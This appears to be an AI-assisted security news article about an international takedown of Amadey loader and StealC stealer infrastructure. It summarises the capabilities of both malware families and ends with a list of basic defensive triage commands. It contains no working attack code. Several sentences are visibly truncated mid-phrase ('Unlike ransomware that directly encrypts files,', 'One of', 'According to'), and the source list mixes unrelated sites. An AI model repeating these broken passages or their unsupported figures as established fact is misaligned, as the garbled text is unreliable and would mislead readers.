Listen to this Post
Introduction
A major international cybersecurity operation has dealt one of the strongest blows yet against the modern malware economy. Law enforcement agencies working alongside leading cybersecurity firms successfully dismantled large portions of the infrastructure supporting two notorious malware families, Amadey and StealC. The operation represents far more than a simple server seizure. It directly targeted the hidden ecosystem that enables ransomware attacks, credential theft, financial fraud, and large-scale cybercrime across the world.
The action forms part of the broader Operation Endgame initiative, an ongoing multinational effort focused on disrupting malware services before they can be used to launch devastating attacks. Authorities not only removed servers and domains but also identified millions of stolen credentials, restricted access to criminal cryptocurrency assets, and severed command-and-control channels used by threat actors to manage infected devices. The operation demonstrates how governments and private security companies are increasingly coordinating their efforts to strike at the infrastructure that fuels cybercrime-as-a-service operations.
Operation Endgame Expands Its Reach
The latest phase of Operation Endgame brought together law enforcement agencies from Belgium, Canada, Denmark, France, Germany, the Netherlands, the United Kingdom, and the United States. Cybersecurity companies including Microsoft, Bitdefender, ESET, and Bitsight played a critical role by providing technical intelligence and infrastructure analysis.
Over a two-week campaign, investigators successfully dismantled 326 servers and seized 142 malicious domains associated with malware distribution activities. Authorities also identified and restricted over $47 million worth of cryptocurrency believed to be linked to criminal operations.
Perhaps even more significant was the recovery of approximately 27 million stolen login credentials. These credentials could have been used for identity theft, account takeovers, ransomware deployment, espionage campaigns, and financial fraud operations targeting both individuals and enterprises.
The coordinated action illustrates how modern cybercrime networks depend heavily on infrastructure. Removing that infrastructure can be more damaging than simply arresting individual operators because it disrupts entire criminal supply chains.
The Growing Threat of Malware-as-a-Service
Cybercriminals increasingly operate under a Malware-as-a-Service (MaaS) business model. Instead of developing malware themselves, attackers can effectively rent malicious tools through subscription services.
Amadey and StealC are prime examples of this model. Their developers provide malware platforms while affiliates focus on infecting victims and monetizing stolen data.
This business approach mirrors legitimate software industries. Criminal developers maintain products, release updates, provide support, and charge licensing fees. Affiliates gain access to sophisticated attack capabilities without needing advanced programming knowledge.
The result is a thriving underground marketplace where malware deployment becomes accessible to a much wider pool of threat actors.
Understanding
Amadey first emerged in 2018 and rapidly became one of the most widely used malware loaders in the underground ecosystem.
Unlike ransomware that directly encrypts files,
Once installed, the malware can perform numerous actions:
System Fingerprinting and Reconnaissance
Amadey collects detailed information about infected devices, allowing attackers to evaluate potential targets before deploying additional malware.
The gathered intelligence helps threat actors determine whether a system belongs to an individual user, a corporation, or a high-value organization.
Payload Delivery Capabilities
One of
This flexibility allows attackers to transform a simple infection into a full-scale compromise.
Remote Control Features
The malware includes extensive remote access functionality.
Attackers can:
Execute commands remotely
Open SOCKS proxy connections
Enable Remote Desktop Protocol access
Launch reverse proxy sessions
Establish VNC remote control sessions
These capabilities effectively turn infected systems into remotely controlled assets.
Credential and Data Theft
Amadey can capture clipboard contents and harvest stored credentials, giving attackers access to sensitive information ranging from passwords to cryptocurrency wallet addresses.
The Rapid Expansion of Amadey
Cybersecurity researchers observed a dramatic rise in Amadey activity between 2023 and 2025.
What began as a relatively small malware operation evolved into a widespread criminal platform. Researchers recorded malware sample distributions rising from only dozens of payloads in 2019 to more than eleven thousand payloads during 2025.
The increase highlights how malware ecosystems can scale rapidly once they gain popularity among criminal affiliates.
Despite recent declines in command-and-control server activity, Amadey remained a critical component of many attack chains entering 2026.
StealC: The Modern Information Stealer
While Amadey focuses on gaining initial access, StealC specializes in extracting valuable information from infected systems.
Introduced in 2023, the malware quickly became popular among cybercriminals because of its affordability, flexibility, and continuous development.
StealC targets a wide range of sensitive information.
Browser Data Theft
The malware aggressively targets Chromium-based browsers.
It can collect:
Saved passwords
Session cookies
Autofill information
Browsing histories
Credit card details
Browser extension data
These stolen assets are highly valuable because session cookies often allow attackers to bypass password requirements entirely.
Application Credential Harvesting
StealC extends beyond web browsers.
The malware targets applications including:
Discord
Telegram
Steam
Microsoft Outlook
FileZilla
Foxmail
This enables attackers to gather both personal and corporate credentials from a single infected system.
Secondary Malware Delivery
Like Amadey, StealC also functions as a malware loader.
Attackers can issue commands that instruct infected systems to download and execute additional payloads, creating opportunities for ransomware deployment and advanced intrusions.
Why StealC Avoids Certain Countries
One unusual characteristic of StealC is its geographic filtering capability.
The malware checks system language settings and may terminate itself if it detects environments associated with Russia, Belarus, Kazakhstan, Ukraine, or Uzbekistan.
This behavior has become common among malware developed by operators located within regions where local infections could attract unwanted attention from domestic authorities.
Amadey demonstrates similar restrictions by disabling certain credential theft functions on systems configured for specific regional settings.
Vulnerabilities Found Inside Criminal Infrastructure
Ironically, security researchers discovered serious vulnerabilities within
Researchers identified weaknesses including cross-site scripting vulnerabilities and directory traversal flaws that exposed operational details about the malware service.
These security flaws reportedly allowed researchers to gain insights into customer activity and potentially exposed information belonging to malware affiliates.
One vulnerability even made it possible to upload web shells to StealC command-and-control servers before developers eventually released patches.
The discovery highlights a recurring pattern within underground cybercrime operations: attackers often fail to maintain the same security standards they exploit against victims.
Microsoft Reveals Massive Infection Numbers
According to
The company also reported identifying over 18,000 victim systems and successfully disrupting criminal control mechanisms connected to those devices.
Additionally, approximately 200 malicious command-and-control domains and IP addresses were neutralized through legal actions, domain seizures, registrations, and provider notifications.
These figures provide a glimpse into the extraordinary scale at which modern malware ecosystems operate.
The Relationship Between Loaders and Stealers
Cybersecurity experts often describe loaders and information stealers as two interconnected stages of the same criminal business process.
A loader gains access.
A stealer monetizes that access.
Once credentials, cookies, and financial information are harvested, the data is sold through underground marketplaces, encrypted messaging channels, and cybercrime forums.
This process transforms individual infections into recurring revenue streams for cybercriminal organizations.
Disrupting either side of the chain creates challenges for attackers. Disrupting both simultaneously can significantly weaken entire criminal ecosystems.
What Undercode Say:
The significance of this operation extends far beyond the seizure of a few hundred servers.
Operation Endgame is increasingly targeting infrastructure instead of individuals.
Historically, arresting malware developers often produced only temporary disruptions.
New operators would quickly replace them.
Infrastructure takedowns create wider ripple effects.
Removing command-and-control servers breaks communication channels.
Seizing domains interrupts malware delivery.
Blocking cryptocurrency wallets disrupts monetization.
Recovering credentials reduces criminal inventory.
The Amadey-StealC partnership demonstrates how specialized cybercrime has become.
One malware family gains access.
Another steals data.
Others deploy ransomware.
Different groups cooperate within a shared ecosystem.
This modular approach resembles legitimate cloud services.
Every criminal service focuses on a specific task.
The operation also reveals growing collaboration between governments and private security companies.
Modern cybercrime investigations increasingly depend on threat intelligence supplied by technology vendors.
Without telemetry from global security platforms, identifying infrastructure at this scale would be difficult.
Another important trend is the growing use of legal mechanisms.
Domain seizures and court orders now complement traditional law enforcement tactics.
The malware economy depends heavily on trust among criminals.
Infrastructure disruptions weaken that trust.
Affiliates become uncertain whether platforms remain secure.
Developers lose customers.
Revenue streams decline.
Confidence in underground services deteriorates.
The discovery of vulnerabilities inside StealC infrastructure is particularly noteworthy.
Cybercriminal platforms often prioritize offensive capabilities over defensive security.
Researchers increasingly exploit those weaknesses.
This creates opportunities for intelligence collection and disruption.
The operation also highlights the importance of attacking the initial access stage.
Most ransomware incidents begin with a foothold.
Preventing that foothold eliminates later stages of the attack chain.
Organizations should view loaders such as Amadey with the same level of concern as ransomware itself.
By the time ransomware appears, attackers have often spent days or weeks inside a network.
Stopping loaders can prevent the entire compromise lifecycle.
The takedown may not eliminate Amadey or StealC permanently.
However, it raises operational costs for criminals.
Higher costs generally translate into reduced activity.
That remains one of the most effective strategies in long-term cybercrime disruption.
Deep Analysis: Linux, Windows, and Incident Response Commands
Monitoring Suspicious Network Connections
netstat -antp ss -tulnp lsof -i
Investigating Running Processes
ps aux top htop pstree
Searching for Persistence Mechanisms
crontab -l systemctl list-unit-files find /etc/systemd -type f
Reviewing Authentication Activity
last lastlog journalctl -xe
Identifying Malware Downloads
find /tmp -type f find /var/tmp -type f find /home -name ".sh"
Monitoring DNS Activity
tcpdump -i any port 53
Examining Open Files
lsof fuser -v
Windows Investigation Commands
tasklist netstat -ano whoami ipconfig /all
PowerShell Threat Hunting
Get-Process Get-Service Get-ScheduledTask Get-WinEvent
Memory and Forensic Collection
dmesg journalctl vmstat iostat
These commands help defenders identify suspicious processes, unusual outbound communications, unauthorized persistence mechanisms, and indicators frequently associated with loader malware and information stealers.
✅ Europol, multiple law enforcement agencies, and private cybersecurity companies coordinated a major disruption operation targeting Amadey and StealC infrastructure.
✅ Authorities reported dismantling hundreds of servers, seizing domains, identifying millions of stolen credentials, and restricting cryptocurrency assets linked to cybercrime operations.
✅ Amadey and StealC are established Malware-as-a-Service platforms that have been actively used for malware delivery, credential theft, and broader cybercriminal campaigns worldwide.
❌ There is no evidence that the takedown permanently eliminated either malware family. Criminal operators often attempt to rebuild infrastructure after major disruptions.
❌ Infection statistics and operational claims should be interpreted as snapshots in time because malware ecosystems constantly evolve and adapt.
Prediction
(+1) Continued cooperation between global law enforcement agencies and cybersecurity vendors will result in more infrastructure-level takedowns targeting malware distribution networks.
(+1) Increased pressure on malware operators will likely force cybercriminal groups to invest more resources into operational security, raising their costs and reducing profitability.
(+1) Future operations may increasingly focus on cryptocurrency tracing, credential marketplaces, and affiliate recruitment channels rather than only malware servers.
(-1) Amadey and StealC operators may attempt to rebuild portions of their infrastructure using new hosting providers, fresh domains, and updated malware variants.
(-1) Cybercriminal affiliates displaced by this operation could migrate toward alternative Malware-as-a-Service platforms, creating new threats for defenders.
(-1) The cybercrime ecosystem is likely to remain highly adaptive, meaning similar malware services may emerge even as current infrastructure is dismantled.
▶️ Related Video (82% Match):
🕵️📝Let’s dive deep and fact‑check.
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
References:
Reported By: thehackernews.com
Extra Source Hub (Possible Sources for article):
https://www.pinterest.com
Wikipedia
OpenAi & Undercode AI
Image Source:
Unsplash
Undercode AI DI v2
🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
📢 Follow UndercodeNews & Stay Tuned:
𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky | 🐘Mastodon | 📺Youtube
